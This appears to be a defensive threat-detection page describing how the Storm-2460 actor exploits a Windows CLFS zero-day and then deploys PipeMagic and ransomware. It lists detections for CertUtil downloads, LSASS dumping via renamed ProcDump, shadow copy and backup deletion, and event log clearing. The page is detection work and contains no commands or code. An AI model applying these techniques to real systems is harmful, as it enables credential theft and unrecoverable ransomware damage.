Analytics Story: Storm-2460 CLFS Zero Day Exploitation

Description

This analytic story focuses on the exploitation of a Common Log File System (CLFS) driver vulnerability by the Storm-2460 threat actor. The attack chain involves initial access through a zero-day vulnerability in the Windows CLFS driver, followed by the deployment of PipeMagic malware. The threat actor then leverages various living-off-the-land techniques, including the abuse of MSBuild, CertUtil, and ProcDump, to maintain persistence and exfiltrate data. The attack culminates in ransomware deployment, with the actor taking steps to disable system recovery and clear logs to hinder incident response.

Why it matters

Storm-2460, a sophisticated threat actor, has been observed exploiting a zero-day vulnerability in the Windows Common Log File System (CLFS) driver. The attack begins with the exploitation of the CLFS driver vulnerability, which allows the threat actor to gain initial access to the target system. Following successful exploitation, the actor deploys PipeMagic malware, a custom tool designed to facilitate further system access and control.

Once established on the system, Storm-2460 employs various living-off-the-land techniques to maintain persistence and evade detection. The threat actor frequently uses MSBuild.exe, often renamed or spawned by script processes, to execute malicious code. They also leverage CertUtil.exe for various purposes, including downloading additional payloads and extracting certificates. In their credential theft operations, they utilize ProcDump renamed as dllhost.exe to dump LSASS memory. To cover their tracks, they disable system recovery options through bcdedit and wbadmin commands, while using wevtutil to clear event logs and remove evidence of their activities.

The attack chain demonstrates a high level of sophistication, with the threat actor carefully selecting legitimate Windows tools and utilities to carry out their objectives while minimizing the risk of detection. The use of renamed tools and script-based execution methods helps them blend in with normal system activity, making detection more challenging for security teams.

The final stage of the attack involves the deployment of ransomware, with the threat actor taking specific steps to ensure their encryption activities cannot be easily reversed. They systematically disable Windows recovery options and delete system backups and shadow copies to prevent system restoration. To further hinder incident response and forensic investigation, they clear logs and use legitimate tools in ways that appear normal to security systems. This comprehensive approach to persistence and anti-forensics makes the attack particularly challenging to detect and remediate.

This analytic story provides comprehensive detection coverage for the various stages of the Storm-2460 attack chain, from initial exploitation through ransomware deployment. The included detections focus on identifying the abuse of legitimate tools and unusual system modifications that may indicate the presence of this threat actor. By monitoring for these specific behaviors and tool abuses, security teams can better detect and respond to this sophisticated threat.

Detections

Name ▲▼ Technique ▲▼ Type ▲▼
BCDEdit Failure Recovery Modification Inhibit System Recovery TTP
CertUtil Download With URLCache and Split Arguments Ingress Tool Transfer TTP
CertUtil Download With VerifyCtl and Split Arguments Ingress Tool Transfer TTP
Certutil exe certificate extraction None TTP
CertUtil With Decode Argument Deobfuscate/Decode Files or Information TTP
Deleting Shadow Copies Inhibit System Recovery TTP
DLLHost with no Command Line Arguments with Network Process Injection TTP
Dump LSASS via procdump LSASS Memory TTP
MSBuild Suspicious Spawned By Script Process MSBuild TTP
Suspicious msbuild path Rename Legitimate Utilities, MSBuild TTP
Suspicious MSBuild Rename Rename Legitimate Utilities, MSBuild Hunting
Suspicious MSBuild Spawn MSBuild TTP
Suspicious wevtutil Usage Clear Windows Event Logs TTP
WBAdmin Delete System Backups Inhibit System Recovery TTP
Windows CertUtil Download With URL Argument Ingress Tool Transfer TTP
Windows SQL Spawning CertUtil Ingress Tool Transfer TTP
Windows Steal Authentication Certificates CertUtil Backup Steal or Forge Authentication Certificates Anomaly

Data Sources

Name ▲▼ Platform ▲▼ Sourcetype ▲▼ Source ▲▼
CrowdStrike ProcessRollup2 N/A crowdstrike:events:sensor crowdstrike
Sysmon EventID 1 Windows icon Windows xmlwineventlog XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Sysmon EventID 3 Windows icon Windows xmlwineventlog XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Windows Event Log Security 4688 Windows icon Windows xmlwineventlog XmlWinEventLog:Security

References


Source: GitHub | Version: 1